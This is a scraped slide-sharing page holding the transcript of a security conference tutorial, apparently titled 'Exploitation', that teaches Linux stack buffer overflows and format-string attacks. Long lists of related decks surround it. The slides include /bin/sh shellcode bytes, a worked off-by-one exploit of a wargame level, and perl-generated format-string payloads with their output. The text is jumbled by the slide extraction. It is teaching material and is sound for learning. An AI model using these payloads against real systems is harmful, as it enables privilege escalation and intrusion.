Introduction to Linux Exploit Development
Introduction to Linux Exploit DevelopmentIntroduction to Linux Exploit Development
Introduction to Linux Exploit Development
 
Advance ROP Attacks
Advance ROP AttacksAdvance ROP Attacks
Advance ROP Attacks
 
Software to the slaughter
Software to the slaughterSoftware to the slaughter
Software to the slaughter
 
The Stack and Buffer Overflows
The Stack and Buffer OverflowsThe Stack and Buffer Overflows
The Stack and Buffer Overflows
 
127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux
 
Devirtualizing FinSpy
Devirtualizing FinSpyDevirtualizing FinSpy
Devirtualizing FinSpy
 
Test2 Sum05
Test2 Sum05Test2 Sum05
Test2 Sum05
 
Exploit exercises.com stack-overflows
Exploit exercises.com stack-overflowsExploit exercises.com stack-overflows
Exploit exercises.com stack-overflows
 
Bypassing DEP using ROP
Bypassing DEP using ROPBypassing DEP using ROP
Bypassing DEP using ROP
 
CNIT 127: Ch 2: Stack Overflows in Linux
CNIT 127: Ch 2: Stack Overflows in LinuxCNIT 127: Ch 2: Stack Overflows in Linux
CNIT 127: Ch 2: Stack Overflows in Linux
 
127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux
 
CNIT 127 Ch 2: Stack overflows on Linux
CNIT 127 Ch 2: Stack overflows on LinuxCNIT 127 Ch 2: Stack overflows on Linux
CNIT 127 Ch 2: Stack overflows on Linux
 
Central processing unit
Central processing unitCentral processing unit
Central processing unit
 
CNIT 127: Ch 2: Stack overflows on Linux
CNIT 127: Ch 2: Stack overflows on LinuxCNIT 127: Ch 2: Stack overflows on Linux
CNIT 127: Ch 2: Stack overflows on Linux
 
8051 Microcontroller PPT's By Er. Swapnil Kaware
8051 Microcontroller PPT's By Er. Swapnil Kaware8051 Microcontroller PPT's By Er. Swapnil Kaware
8051 Microcontroller PPT's By Er. Swapnil Kaware
 
8051 Microcontroller By Er. Swapnil Kaware
8051 Microcontroller By Er. Swapnil Kaware8051 Microcontroller By Er. Swapnil Kaware
8051 Microcontroller By Er. Swapnil Kaware
 
Basic of Exploitation
Basic of ExploitationBasic of Exploitation
Basic of Exploitation
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacks
 
1
11
1
 
1
11
1
 

Plus de Security B-Sides

Lord of the bing b-sides atl
Lord of the bing b-sides atlLord of the bing b-sides atl
Lord of the bing b-sides atlSecurity B-Sides
 
2010 07 BSidesLV Mobilizing The PCI Resistance 1c
2010 07 BSidesLV Mobilizing The PCI Resistance 1c 2010 07 BSidesLV Mobilizing The PCI Resistance 1c
2010 07 BSidesLV Mobilizing The PCI Resistance 1c Security B-Sides
 
Tastes Great vs Less Filling: Deconstructing Risk Management (A Practical App...
Tastes Great vs Less Filling: Deconstructing Risk Management (A Practical App...Tastes Great vs Less Filling: Deconstructing Risk Management (A Practical App...
Tastes Great vs Less Filling: Deconstructing Risk Management (A Practical App...Security B-Sides
 
Social Penetration - Mike Murray and Mike Bailey
Social Penetration - Mike Murray and Mike BaileySocial Penetration - Mike Murray and Mike Bailey
Social Penetration - Mike Murray and Mike BaileySecurity B-Sides
 
How really to prepare for a credit card compromise (PCI) forensics investigat...
How really to prepare for a credit card compromise (PCI) forensics investigat...How really to prepare for a credit card compromise (PCI) forensics investigat...
How really to prepare for a credit card compromise (PCI) forensics investigat...Security B-Sides
 
Risk Management - Time to blow it up and start over? - Alex Hutton
Risk Management - Time to blow it up and start over? - Alex HuttonRisk Management - Time to blow it up and start over? - Alex Hutton
Risk Management - Time to blow it up and start over? - Alex HuttonSecurity B-Sides
 
Security? Who cares! - Brett Hardin
Security? Who cares! - Brett HardinSecurity? Who cares! - Brett Hardin
Security? Who cares! - Brett HardinSecurity B-Sides
 
Advanced Persistent Threats (Shining the Light on the Industries' Best Kept S...
Advanced Persistent Threats (Shining the Light on the Industries' Best Kept S...Advanced Persistent Threats (Shining the Light on the Industries' Best Kept S...
Advanced Persistent Threats (Shining the Light on the Industries' Best Kept S...Security B-Sides
 
Computing Risk without Numbers: A Semantic Approach to Risk Metrics - Tim Ke...
Computing Risk without Numbers: A Semantic Approach to Risk Metrics - Tim Ke...Computing Risk without Numbers: A Semantic Approach to Risk Metrics - Tim Ke...
Computing Risk without Numbers: A Semantic Approach to Risk Metrics - Tim Ke...Security B-Sides
 
The Great Compliance Debate: No Child Left Behind or The Polio Vaccine
The Great Compliance Debate: No Child Left Behind or The Polio VaccineThe Great Compliance Debate: No Child Left Behind or The Polio Vaccine
The Great Compliance Debate: No Child Left Behind or The Polio VaccineSecurity B-Sides
 
Dominique Karg - Advanced Attack Detection using OpenSource tools
Dominique Karg - Advanced Attack Detection using OpenSource toolsDominique Karg - Advanced Attack Detection using OpenSource tools
Dominique Karg - Advanced Attack Detection using OpenSource toolsSecurity B-Sides
 
Enterprise Portals - Gateway to the Gold
Enterprise Portals - Gateway to the GoldEnterprise Portals - Gateway to the Gold
Enterprise Portals - Gateway to the GoldSecurity B-Sides
 
From fishing to phishing to ?
From fishing to phishing to ?From fishing to phishing to ?
From fishing to phishing to ?Security B-Sides
 
Getting punched in the face
Getting punched in the faceGetting punched in the face
Getting punched in the faceSecurity B-Sides
 
Smashing the stats for fun (and profit)
Smashing the stats for fun (and profit)Smashing the stats for fun (and profit)
Smashing the stats for fun (and profit)Security B-Sides
 

Plus de Security B-Sides (20)

Lord of the bing b-sides atl
Lord of the bing b-sides atlLord of the bing b-sides atl
Lord of the bing b-sides atl
 
The road to hell v0.6
The road to hell v0.6The road to hell v0.6
The road to hell v0.6
 
2010 07 BSidesLV Mobilizing The PCI Resistance 1c
2010 07 BSidesLV Mobilizing The PCI Resistance 1c 2010 07 BSidesLV Mobilizing The PCI Resistance 1c
2010 07 BSidesLV Mobilizing The PCI Resistance 1c
 
Tastes Great vs Less Filling: Deconstructing Risk Management (A Practical App...
Tastes Great vs Less Filling: Deconstructing Risk Management (A Practical App...Tastes Great vs Less Filling: Deconstructing Risk Management (A Practical App...
Tastes Great vs Less Filling: Deconstructing Risk Management (A Practical App...
 
Social Penetration - Mike Murray and Mike Bailey
Social Penetration - Mike Murray and Mike BaileySocial Penetration - Mike Murray and Mike Bailey
Social Penetration - Mike Murray and Mike Bailey
 
How really to prepare for a credit card compromise (PCI) forensics investigat...
How really to prepare for a credit card compromise (PCI) forensics investigat...How really to prepare for a credit card compromise (PCI) forensics investigat...
How really to prepare for a credit card compromise (PCI) forensics investigat...
 
Risk Management - Time to blow it up and start over? - Alex Hutton
Risk Management - Time to blow it up and start over? - Alex HuttonRisk Management - Time to blow it up and start over? - Alex Hutton
Risk Management - Time to blow it up and start over? - Alex Hutton
 
Security? Who cares! - Brett Hardin
Security? Who cares! - Brett HardinSecurity? Who cares! - Brett Hardin
Security? Who cares! - Brett Hardin
 
Advanced Persistent Threats (Shining the Light on the Industries' Best Kept S...
Advanced Persistent Threats (Shining the Light on the Industries' Best Kept S...Advanced Persistent Threats (Shining the Light on the Industries' Best Kept S...
Advanced Persistent Threats (Shining the Light on the Industries' Best Kept S...
 
Computing Risk without Numbers: A Semantic Approach to Risk Metrics - Tim Ke...
Computing Risk without Numbers: A Semantic Approach to Risk Metrics - Tim Ke...Computing Risk without Numbers: A Semantic Approach to Risk Metrics - Tim Ke...
Computing Risk without Numbers: A Semantic Approach to Risk Metrics - Tim Ke...
 
The Great Compliance Debate: No Child Left Behind or The Polio Vaccine
The Great Compliance Debate: No Child Left Behind or The Polio VaccineThe Great Compliance Debate: No Child Left Behind or The Polio Vaccine
The Great Compliance Debate: No Child Left Behind or The Polio Vaccine
 
Dominique Karg - Advanced Attack Detection using OpenSource tools
Dominique Karg - Advanced Attack Detection using OpenSource toolsDominique Karg - Advanced Attack Detection using OpenSource tools
Dominique Karg - Advanced Attack Detection using OpenSource tools
 
2009 Zacon Haroon Meer
2009 Zacon Haroon Meer2009 Zacon Haroon Meer
2009 Zacon Haroon Meer
 
Enterprise Portals - Gateway to the Gold
Enterprise Portals - Gateway to the GoldEnterprise Portals - Gateway to the Gold
Enterprise Portals - Gateway to the Gold
 
From fishing to phishing to ?
From fishing to phishing to ?From fishing to phishing to ?
From fishing to phishing to ?
 
Getting punched in the face
Getting punched in the faceGetting punched in the face
Getting punched in the face
 
Make Tea Not War
Make Tea Not WarMake Tea Not War
Make Tea Not War
 
OWASP Proxy
OWASP ProxyOWASP Proxy
OWASP Proxy
 
Smashing the stats for fun (and profit)
Smashing the stats for fun (and profit)Smashing the stats for fun (and profit)
Smashing the stats for fun (and profit)
 
Layer 2 Hackery
Layer 2 HackeryLayer 2 Hackery
Layer 2 Hackery
 

Dernier

Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DayH2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DaySri Ambati
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 

Dernier (20)

Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DayH2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 

Exploitation

  • 1. Exploits and Exploit Development The basics
  • 2. ELF Binaries • ELF == Executable and Linkable Format • Different segments, .text, .data, .bss and so on • Layout of binary in memory
  • 3. Top of memory The segments stack 0xFFFFFFFF nothing (empty) • .text (code) • .data heap • .bss .bss • heap .data • stack .text (code) Bottom of memory 0x00000000
  • 4. The Stack • Stack is used for function calls. • There are 2 registers on the CPU associated with the stack, the EBP (Extended Base Pointer) and ESP (Extended Stack Pointer) • ESP points to the top of the stack, whereas EBP points to the beginning of the current frame. • When a function is called, arguments, EIP and EBP are pushed onto stack. • EBP is set to ESP, and ESP is decremented to make space for the functions local variables.
  • 5. The Stack Continued 0xbfff9000 0xbfff9000 the stack saved EIP the stack 0x08049800 0x08049800 0xbfffdd08 saved EBP 0xbfffdd08 func_1() EBP func_1() saved EIP char buf[128]; char buf[128]; saved EBP ESP 0x08049800 0xbfffdd08 func_2() EBP Free memory saved EIP == ret addr int i = 0; float z = 99.9; ESP Free memory 0xbfff8000 0xbfff8000
  • 6. Buffer Overflows • Programming bug the stack the stack the stack • Input or data is not 0x08049800 saved EIP 0x08049800 0x41414141 properly bounds 0xbfffdd08 saved EBP 0xbfffdd08 0x41414141 checked func_1() func_1() func_1() 0x00000000 0x41414141 0x41414141 • char buf[128]; 0x41414141 Example Code: 0x41414141 0x41414141 char some_data[256]; memset(some_data,’A’,254); Free memory Free memory Free memory memcpy(buf,some_data);
  • 7. Exploiting : The Aim Our aim is to somehow main() func3() divert the flow of the int i; int x = 0; int one = 1; program and get it to char *ptr; int two = 2; int three = 3; execute what we want. func4() func1() func2() char buf[32] char *p = 0; int *p; int i = 0,x = 0; int size = 0; float temp; exit(-1);
  • 8. Exploiting : The Aim Our aim is to somehow main() func3() divert the flow of the int i; int x = 0; int one = 1; program and get it to char *ptr; int two = 2; int three = 3; execute what we want. func4() func1() func2() shellcode() char buf[32] char *p = 0; NOP int *p; int i = 0,x = 0; int size = 0; float temp; exit(-1); execl();
  • 9. Method 1 : Smashing the Stack Putting it all together Using input or data that the stack • Combine what we saved EIP 0x41414141 we provide, we can control the value that gets written know about stack, saved EBP 0x41414141 and buffer func_1() over the return address, overflows 0x41414141 or saved EIP value. 0x41414141 0x41414141 • Can use this to redirect the flow of execution Free memory
  • 10. Buffer Overflow : Example 01 gdb output: example_01.c: 18 A’s 24 A’s 26 A’s
  • 11. Buffer Overflow : Example 02 gdb output: example_02.c:
  • 12. Show me the MONEY! saved EIP the stack 0x41414141 We control this. saved EBP 0x41414141 func_1() But now that we control the return address, 0x41414141 what do we do with it? 0x41414141 0x41414141 Where do we want the flow of execution to go? Free memory The Answer?
  • 13. Shellcode Example Shellcode: • This is just code that spawns a shell. “x31xc0xb0x46x31xd • Comes in many different varieties. bx31xc9xcdx80xeb x16x5b • Some bind to ports, some connect to specific x31xc0x88x43x07x89 x5bx08x89x43x0c servers, some just spawn a local shell, some really xb0x0bx8dx4bx08x8d small, some are multipart. x53x0cxcd x80xe8xe5xffxffxffx2f • All created to suit the needs of the creator for x62x69x6ex2fx73x68” whatever purpose he might need them for, or to avoid certain restrictions that limit its execution. Spawns a “/bin/sh” process.
  • 14. Shellcode Continued • Now that we know we need to use shellcode, where do we put it. • There are a couple options, all depending on various factors. • Environment Variable • Inside the overflown buffer itself • Some other part of memory that we can write to • etc
  • 15. Example 01 : Exploited Shellcode in Environment getenvaddr.c : Variable: #include <stdio.h> #include <stdlib.h> #include <string.h> int main(int arc, char *argv[]){ char *ptr; if(argc < 3){ printf(“Usage : %s <env var> <program name>n”,argv[0]); exit(0); } ptr = getenv(argv[1]); ptr += (strlen(argv[0]) - strlen(argv[2])) * 2; printf(“%s will be at %pn”,argv[1],ptr); Getting address of return 0; Environment Variable: }
  • 16. Shellcode : Alignment + NOP Sled 0xbfbfef6b 0xeb175b31 0xc0884307 0x895b0889 0x430c508d 0x53085253 0xb03b50cd Saved EIP 0xbfbfef6b 0xbfbfef7a 0x90909090 0x90909090 0xeb175b31 0xc0884307 0x895b0889 0x430c508d NOP Sled
  • 17. Example 01: We have shell • We have now exploited the program • We gained new access level, namely moving from “tritured” to “root” • From here we can do various other things, like install backdoors, or kernel mods, etc.
  • 18. Example 02 : Exploited Get address of SHELLCODE env variable: This time, we not going to use a NOP sled, so have to be precise:
  • 19. IO level 6 : Real World level6.c : #include <string.h> • As you can see, the programmer has // The devil is in the details - nnp implemented some bounds checking to void copy_buffer(char *argv[]) prevent buffer overflows { • char buf1[32], buf2[32], buf3[32]; However, he has introduced a new bug, strncpy(buf2, argv[1], 31); strncpy(buf3, argv[2], sizeof(buf3)); called an off-by-one error strcpy(buf1, buf3); • } int main(int argc, char *argv[]) We can still overflow the buffer { copy_buffer(argv); return 0; • And we still overwrite EIP to point to our } shellcode
  • 20. IO Level 6 : Cont How strings work, and are delimited in memory: 0xbfbfeea0 0xbfbfeea1 0xbfbfede 0xbfbfedf 0x09 This is just some random text to help show how a string works 0x00 NULL byte Level 6’s copy_buffer stack layout: 0xbfbfaa00 0xbfbfaa20 0xbfbfaa40 buf3[32] buf2[32] buf1[32] some text here 0x00 some other text 0x00 and some other string 0x00
  • 21. IO Level 6 : Cont The problem lies in these 3 lines: strncpy(buf2, argv[1], 31); strncpy(buf3, argv[2], sizeof(buf3)); strncpy(buf1, buf3); • The first line copies at most 31 bytes, leaving space for a NULL byte at the end. • The second line however, copies at most 32 bytes, and therefore, might not leave space for a NULL pointer at the end, this is where the off-by-one error comes in. • The third line then copies buf3, into buf1, heres where we can overwrite the saved EIP
  • 22. strncpy(buf2, argv[1], 31); strncpy(buf3, argv[2], sizeof(buf3)); IO Level 6 : Cont strncpy(buf1, buf3); Level 6’s copy_buffer stack layout: 0xbfbfaa20 0xbfbfaa40 0xbfbfaa00 buf3[32] buf2[32] buf1[32] strncpy(buf2, argv[1], 31); 0x414141414141 0x00 strncpy(buf3, argv[2], sizeof(buf3)); 0x42424242424242 0x42 0x414141414141 0x00 strcpy(buf1, buf3) buf3 buf2 buf1 0x424242424242 0x4 0x4141414141 0x0 0x4242424242424 0x42 0x41414141 42 2 41 0 242 buf3
  • 23. IO Level 6 : Cont • Do Demo here
  • 24. Method 02 : Format String • Format strings are the next kind of bug that we will exploit • They are normally caused by a programmer not providing a valid format string to printf and just doing something like : printf(variable); • However this becomes a bit of a problem, since we are no longer overflowing a buffer, so therefore we cannot just overwrite the saved EIP. • This makes redirecting the program flow a bit more difficult
  • 25. Format example of printf and how Quick and dirty String : Cont function parameters are pushed onto stack: printf: With format string exploits, there are two parameters to print that we need to use. example code: The first paramter we will look at is “%x”. All that int count_one = 0; %x does, is tell printf to print the hex value of the variable in the corresponding position. eg: printf(“number of bytes written up to “ “this point%nn”,&count_one); printf(“The value is : 0x%08xn”,size); printf(“count_one = %dn”,count_one); printf(“The value of ”count_one” is “ The second parameter we need to look at is “: 0x%08xn”,count_one); “%n”. What %n does is the opposite to the rest of the printf parameters. Instead of reading value from a variable and formatting it for display, it output: actually saves the number of bytes that printf has written to the variable in the corresponding number of bytes written up to this point position, eg: count_one = 40 The value of “count_one” is : 0x00000028 printf(“Number of bytes written%nn”,&count);
  • 26. Function Variables How variables to functions are pushed to stack: When functions are called and they need the stack to pass variables, they use the stack to z = 10 variable z pass those variables i=2 variable i Example code: 0xbfbf9977 address of format string 0x08048000 saved EIP printf(“The value of i = %d, and z = %dn”,i, z); 0xbfffaa00 saved EBP printf() When variables are pushed to the stack, they are pushed in reverse order, so with the above, the following would happen: push z; push i; push (address of format string) Free memory
  • 27. Format Strings : Cont Example Code: include <stdio.h> • So we know how variables are pushed onto include <string.h> the stack. int main(int argc, char *argv[]){ char buf[1024]; • We know what parameters in the format strncpy(buf, argv[1], sizeof(buf) - 1); string do what. printf(buf); • So what happens when we put more return 0; parameters in the format string than there } are variables pushed onto the stack?
  • 28. Format String : Example Code Testing the code: Example Code: #./format_string `perl -e ‘print “AAAA” . “%08x”x8’` include <stdio.h> AAAAbfbfed98000003ff280770000000032807604000000000000000041414141 include <string.h> [*] test_val @ 0xbfbfe85c = -72 0xffffffb8 # int main(int argc, char *argv[]){ #./getenvaddr PATH ./format_string char buf[1024]; PATH will be at 0xbfbfee0b int test_val = -72; # strncpy(buf, argv[1], sizeof(buf) - 1); #./format_string `perl -e ‘print “x0bxeexbfxbf” . “%08x”x7 . “%s”’` bfbfed98000003ff2807700000000003280760400000000000000000/sbin:/bin:/usr/ printf(buf); sbin:/usr/bin:/usr/games:/usr/local/sbin [*] test_val @ 0xbfbfe85c = -72 0xffffffb8 printf(“n[*] test_val @ 0x%08x = %d “ # “ 0x%08xn”, &test_val, test_val, #./format_string `perl -e ‘print “x5cxe8xbfxbf” . “%08x”x11 . “%n”’` test_val); bfbfed88000003ff000000000000000000000000bfbfea3c2807700000000003280760 4000000000ffffffb8 return 0; [*] test_val @ 0xbfbfe85c = 92 0x0000005c } # #
  • 29. Format Strings : Demo Testing the code: #./format_string `perl -e ‘print “x5cxe8xbfxbf” . “%08x”x11 . “%n”’` bfbfed88000003ff000000000000000000000000bfbfea3c28077000000000032807604000000000ffffffb8 [*] test_val @ 0xbfbfe85c = 92 0x0000005c # #./format_string `perl -e ‘print “x5cxe8xbfxbf” . “%08x”x10 . “%100x . “%n”’` bfbfed88000003ff000000000000000000000000bfbfea3c28077000000000032807604000000000 ffffffb8 [*] test_val @ 0xbfbfe85c = 184 0x000000b8 # #./format_string `perl -e ‘print “x5cxe8xbfxbf” . “%08x”x10 . “%08x” . “%n”’` bfbfed88000003ff000000000000000000000000bfbfea3c28077000000000032807604000000000ffffffb8 [*] test_val @ 0xbfbfe85c = 92 0x0000005c #gdb -q (gdb) p 0xaa - 92 + 8 $1 = 86 # #./format_string `perl -e ‘print “x5cxe8xbfxbf” . “%08x”x10 . “%08x” . “%n”’` bfbfed88000003ff000000000000000000000000bfbfea3c28077000000000032807604000000000 ffffffb8 [*] test_val @ 0xbfbfe85c = 170 0x000000aa
  • 30. Format Strings : Memory Layout Overwriting a single address: Memory 5c 5d 5e 5f First write to 0xbfbfe85c aa 00 00 00 Second write to 0xbfbfe85d bb 00 00 00 Third write to 0xbfbfe85e cc 00 00 00 Fourth write to 0xbfbfe85f dd 00 00 Result aa bb cc dd Modifying our format string: ./format_string `perl -e 'print "x5cxe8xbfxbf" . "%08x"x10 . "%86x" . "%n"'` ./format_string `perl -e 'print "x5cxe8xbfxbfJUNKx5dxe8xbfxbf" . "%08x"x10 . "%86x%n"'`
  • 31. Format Strings : Trial and Error Testing the code: #./format_string `perl -e 'print "x3cxe8xbfxbfJUNKx3dxe8xbfxbfJUNKx3exe8xbfxbfJUNKx3fxe8xbfxbfJUNK" . "%08x"x10 . "%08x %n"'` < JUNK= JUNK> JUNK? JUNKbfbfed6c000003ff000000000000000000000000bfbfea1c28077000000000032807604000000000ffffffb8 [*] test_val @ 0xbfbfe83c = 120 0x00000078 # #gdb -q (gdb) p 0xaa - 120 + 8 $1 = 58 # #/format_string `perl -e 'print "x3cxe8xbfxbfJUNKx3dxe8xbfxbfJUNKx3exe8xbfxbfJUNKx3fxe8xbfxbfJUNK" . "%08x"x10 . "%58x %n"'` < JUNK= JUNK> JUNK? JUNKbfbfed6c000003ff000000000000000000000000bfbfea1c28077000000000032807604000000000 ffffffb8 [*] test_val @ 0xbfbfe83c = 170 0x000000aa # #./format_string `perl -e 'print "x3cxe8xbfxbfJUNKx3dxe8xbfxbfJUNKx3exe8xbfxbfJUNKx3fxe8xbfxbfJUNK" . "%08x"x10 . "%58x %n%08x%n"'` < JUNK= JUNK> JUNK? JUNKbfbfed68000003ff000000000000000000000000bfbfea1c28077000000000032807604000000000 ffffffb84b4e554a [*] test_val @ 0xbfbfe83c = 45738 0x0000b2aa # #gdb -q (gdb) p 0xbb - 0xaa $1 = 17
